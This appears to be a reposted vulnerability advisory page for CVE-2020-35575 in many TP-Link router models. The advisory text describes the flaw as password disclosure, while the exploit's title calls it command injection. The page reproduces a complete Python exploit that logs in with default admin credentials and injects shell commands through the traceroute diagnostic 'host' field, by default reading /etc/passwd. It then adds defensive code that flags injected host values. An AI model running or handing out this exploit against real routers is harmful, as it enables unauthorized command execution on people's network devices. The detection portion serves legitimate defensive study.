Information disclosure vulnerability in multiple TP-Link router products
Vulnerability ID | 2292330 | Vulnerability type | Information disclosure |
Published | 2021-06-25 | Updated | 2021-06-25 |
CVE | CVE-2020-35575 | CNNVD | CNNVD-202012-1558 |
Platform | N/A | CVSS score | N/A |
|Vulnerability source
|Vulnerability details
The TP-Link TL-WR940N, WR1043nd, TL-WR841N, TL-WR740N, MR3420, MR6400, WA701ND, WA801ND, WDR3500, WDR3600, WR1045ND, WR741ND, WR749N, WR802N, WR841HP, WR840HP, WR842N, WR842ND, WR845N, WR941HP, WR945N, WR949N and WRD4300 are wireless routers made by the Chinese company TP-Link. Multiple TP-Link products contain a security vulnerability that stems from password disclosure in the web interface; a remote attacker can exploit it to gain full administrative access to the web panel. The following products and versions are affected: WA901ND devices before 3.16.9(201211) beta, and Archer C5, Archer C7, MR3420, MR6400, WA701ND, WA801ND, WDR3500, WDR3600, WE843N, WR1043ND, WR1045ND, WR740N, WR741ND, WR749N, WR802N, WR840N, WR841HP, WR841N, WR842N, WR842ND, WR845N, WR940N, WR941HP, WR945N, WR949N, and WRD4300 devices.
|Exploit (EXP)
```python
# Exploit Title: TP-Link TL-WR841N - Command Injection
# Date: 2020-12-13
# Exploit Author: Koh You Liang
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip
# Version: TL-WR841N 0.9.1 4.0
# Tested on: Windows 10
# CVE : CVE-2020-35575
import requests
import sys
import time

try:
    _ = sys.argv[2]
    payload = ' '.join(sys.argv[1:])
except IndexError:
    try:
        payload = sys.argv[1]
    except IndexError:
        print("[*] Command not specified, using the default `cat etc/passwd`")
        payload = 'cat etc/passwd'

# Default credentials is admin:admin - replace with your own
cookies = {
    'Authorization': 'Basic YWRtaW46YWRtaW4='
}
headers = {
    'Host': '192.168.0.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
    'Accept': '*/*',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'text/plain',
    'Content-Length': '197',
    'Origin': 'http://192.168.0.1',
    'Connection': 'close',
    'Referer': 'http://192.168.0.1/mainFrame.htm',
}

data1 = \
'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)
response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)
print('[+] Sending payload...')

try:
    response1.text.splitlines()[0]
except IndexError:
    sys.exit('[-] Cannot get response. Please check your cookie.')

if response1.text.splitlines()[0] != '[error]0':
    sys.exit('[*] Router/Firmware is not vulnerable.')

data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'
response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)
print('[+] Receiving response from router...')
time.sleep(0.8)  # Buffer time for traceroute to succeed

data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''
response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)

if '=:' in response3.text.splitlines()[3]:
    print('[-] Command not supported.')
else:
    print('[+] Exploit successful!')
    for line_number, line in enumerate(response3.text.splitlines()):
        try:
            if line_number == 3:
                print(line[12:])
            if line_number > 3 and line != '[error]0':
                print(line)
                if 'not known' in line:
                    break
        except IndexError:
            break
```
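A defensive counterpart to the script above, as an added example that is not part of the original page or the exploit author's code: it parses a request body in the `[TRACEROUTE_DIAG#…]` format shown above and flags any `host` value that is not a plain hostname or IP literal, the kind of allowlist check a proxy or IDS rule in front of the router's web interface could apply. The function names, the allowlist pattern and the sample bodies are assumptions constructed for illustration.

```python
import re

# Section header as it appears in the request bodies on this page,
# e.g. "[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8".
SECTION = re.compile(r"\[(?P<name>[A-Z_]+)#[\d,]+#[\d,]+\][\d,]+")
# Allowlist (assumed for this example): DNS names and IPv4/IPv6 literals only.
VALID_HOST = re.compile(r"[A-Za-z0-9.:-]{1,253}")


def parse_cgi_body(body):
    """Split a CGI body into a list of (section_name, {key: value}) pairs."""
    sections = []
    for line in body.split("\r\n"):
        m = SECTION.fullmatch(line)
        if m:
            sections.append((m.group("name"), {}))
        elif line and sections:
            key, _, value = line.partition("=")
            sections[-1][1][key] = value
    return sections


def suspicious_hosts(body):
    """Return TRACEROUTE_DIAG host values that fail the hostname allowlist."""
    findings = []
    for name, fields in parse_cgi_body(body):
        if name != "TRACEROUTE_DIAG" or "host" not in fields:
            continue
        host = fields["host"]
        # The request format on this page wraps the value in double quotes;
        # strip exactly one surrounding pair before validating.
        if len(host) >= 2 and host[0] == host[-1] == '"':
            host = host[1:-1]
        if not VALID_HOST.fullmatch(host):
            findings.append(host)
    return findings


# Constructed sample bodies (not captured traffic).
BENIGN = ('[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\n'
          'host="example.com"\r\ndiagnosticsState=Requested\r\n')
INJECTED = ('[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\n'
            'host="`id`"\r\ndiagnosticsState=Requested\r\n')

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("injected", INJECTED)):
        print(label, suspicious_hosts(body))
```

An allowlist is used rather than a list of shell metacharacters so that quoting variants and command substitution forms other than backticks are rejected as well.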
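|References
Source: nvd.nist.gov
Link: https://nvd.nist.gov/vuln/detail/CVE-2020-35575
This article was originally written by 华域联盟: 华域联盟 » Information disclosure vulnerability in multiple TP-Link router products
When reposting, please retain the source and the original link: https://www.cnhackhy.com/104021.htm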